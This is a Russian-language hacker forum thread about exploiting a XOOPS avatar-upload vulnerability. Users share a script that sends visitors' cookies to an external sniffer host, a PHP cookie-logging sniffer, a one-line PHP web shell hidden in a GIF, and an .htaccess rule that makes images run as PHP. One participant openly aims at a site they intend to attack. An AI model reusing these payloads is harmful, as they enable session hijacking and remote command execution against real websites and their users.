Обьясните незнающему что такое валидный графический файл с расширением 'phtml' или 'php3, с расширеннием понятно, а вот до него какие то мудрённые слова. В поисковиках с таким вопросом ничего не нашёл, вот и задую этот вопрос тут. Я понимаю это так, что это файл с 2ым расширеннием например "script.php3.jpg" так это или нет? Кому халявный + к репе?

Открываешь графический файл блокнотом , удаляешь всё что там есть и вставляешь свой код например код для получаний куков на сниффер

<script>img=new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и сохраняешь вот тебе и валидный графический файл :rolleyes:

За ответ спасибо...
Ну вот с кодом что-то не то или у меня руки кривые. Вообщем не работает, он должен по сути срабатовать при открытии этой якобы картинки или как?

Угу! Точно ....но это смотря куда ты это впихаешь

Я не точно выразился сорри ...значит так. загружаешь фотку на какой нить чат или форум ( это не всегда срабатывает) смотришь в свойство изоброжения ...там увидешь полный путь к изоброжению например _http://forum.antichat.ru/image.php?u=19805&dateline=1140119839 ( это мой аватар ) берешь этот линк если в чате это хочешь сделать пишеш в место домашней странички например ...далее действуй по своей фантазии

С этим понятно, только наверно это не совсем то что мне нужно. Слазийти по этому URL поймёти про что я http://www.securitylab.ru/vulnerability/205264.php Сделал всё как сказал Electro, аватар всё равно заливаться нехочет, пробывал манипуляции с расширенниями, но всё равно шляпа. Подскажите где косяк?

Для того чтобы сработал этот код в формате гиф нужно гиф интерпритировать как php это для начала....

А не мог бы для начала мне обьяснить как это сделать, "гиф интерпритировать как php", можно по проще объяснить что надо сделать? Или чтоб я вам мозги особо не парил дать URL с инфой, где это всё по полочкам разложенно, если есть такая...

Народ выручайти, + к репе обещаю...

....аватар всё равно заливаться нехочет, пробывал манипуляции с расширенниями, но всё равно шляпа. Подскажите где косяк?
А чего пишет?

Это значит что ты должен написать свой сниффер, но как я вижу ты в ПХП не силён, значить ты должен: 1) заказать его , 2) попросить друзей писать скрипт за тебя. Но есть выход воспользуйся Античатовским снифом вот он http://antichat.ru/cgi-bin/s.jpg.

1 Гаврила пишет вот это MIME type not allowed: text/plain, и кстати только заметил не заливает он аватар только в ослике, в Opere спокойно проходит, странно... Лан аватор я залил, тольку толку... Не работает он, куков ни каких мне не приходит.

2 Tem Зачем мне писать то, что уже давно написано, вот скачал давно уже у меня на локалхосте работает, такой сниффер <?php $ip = getenv("REMOTE_ADDR"); $rhost = getenv(HTTP_REFERER); $input = getenv(QUERY_STRING); $date=(date("d.m.y")); $time=(date("H:i")); $fp = @fopen("snif.txt", "a"); @fputs($fp, "Дата: [ $date ] Время: [ $time ] IP: $ip Хост: $rhost Инфа $input \n"); @fclose($fp); ?>
Обращаюсь к нему обычно так http://mysite/script.jpg
Кстати Tem если ты не заметил то код каторый мне дали указывает как раз на атичатовский сниффер, и странно бы было если я непопробывал бы первоначальный вариант скрипта, это потом я пробывал его править и указывать путь к разным снифферам...

Итак, смотрим в деталях:

--------------------------------------

Details
=======
User may upload valid image file with insecure extension through avatar
upload if "Allow custom avatar upload" is set to "Yes" in "User Info
Settings". This setting is not on in default installation. This is cause
of weak file extension validation XoopsMediaUploader class in file
uploader.php.

if ( preg_match( '/\.(php|cgi|pl|py|asp)$/i', $this->mediaName ) )

$this->setErrors('Filename rejected');
return false;
}

In some web server installation other extension like .phtml,*.php3 is
threat as php script.
------------------------------------------

откуда следует, что если разрешено заливать свои аватары, можно залить графический файл, расширение которого не .(php|cgi|pl|py|asp),
поэтому заливаем с расширением .phtml,*.php3, php5 и т.д., потом, на некоторых серваках файлы с такым расширением считаются PHP скриптами и соответственно интерпретируются.
Проблема в том что при заливке файла проверяется является ли он валидным(нормальным) графическим файлом, т.е. берем нормальный gif, открываем текстовым редактором и в конце набираем что-то типа <?php system($_GET[cmd]); ?> заливаем и открываем нашу картинку в броузере с параметром cmd=ls теоретически PHP проскакивает гиф часть и обрабатывает наш пхп код :-)
Вроде понятно обьяснил, есть вопросы, задавайте...

А сниффер здесь не причем, так заливается шелл...

так ведь что б пхп выполнялся в гифе надо что б в конфиге серва было это разрешено... Не помню название файлика... сорри ... Вот, а попробуй менее актуальную но более эффективну багу: jpeg of death.

DetMyl Сделал как ты сказал. Залил картинку на локалхост, и набрал в браузе такой адрес http://localhost/img.gif?cmd=ls Ни чего не произошло, залил в движок XOOPS этот гиф в виде аватара, обратилься по такому адресу к ней http://localhost/xoops/uploads/cavt440cb44249af1.gif?cmd=ls Тажа история...
Что я тут не правильно делаю, или я неуловил что-то?
А если в конфиг надо править, то это не пойдёт, не часто встретиш сервы с разрешеннием выполнения пхп в гифе...

LTK* Что за бага такая jpeg of death и как её использовать. Можеш поконкретней?

не gif, файл должен иметь расширение phtml или php3

Vovec, а ты создай на localhost в директории uploads файлик .htaccess и запиши в него:

<Files "cavt440cb44249af1.gif">
AddType application/x-httpd-php .gif
</Files>

вот тогда хоть чтото произойдёт...

DetMyl при закачки аватора с разрешением php3 движок пишет Errors Returned While Uploading MIME type not allowed: application/octet-stream, если создаю такое разрешенние php3.gif аватара закачиваеться, но с какого то ... php3 обрезаеться и фаил становиться просто gif, если gif.php3 тажа история что и с расширение php3

TANZWUT ну сделал я так как ты сказал, браузер мне вывел всё содержимое этого файла и всё, а поидее если не ошибаюсь должен вылезти список всех папок и файлов в корне движка, да и чё толку мне от того если бы так было, на локалхосте я только проверяю, как я размещу на аттакуемом сайте в .htaccess это код.Админа чтоль попрошу)

Значит не дырявый сервер, в описании баги пишет "User may upload valid image file with insecure extension through avatar upload if "Allow custom avatar upload" is set to "Yes".This setting is not on in default installation."
A может быть мы что-то не так поняли :)

Неужели нет на этом форуме человека который пользовалься этой уязвимостью в движке http://www.securitylab.ru/vulnerability/205264.php Для проверки даже на локалхосте поставил версию подходяшию для взлома через эту уязвимость, что же я не так делаю.....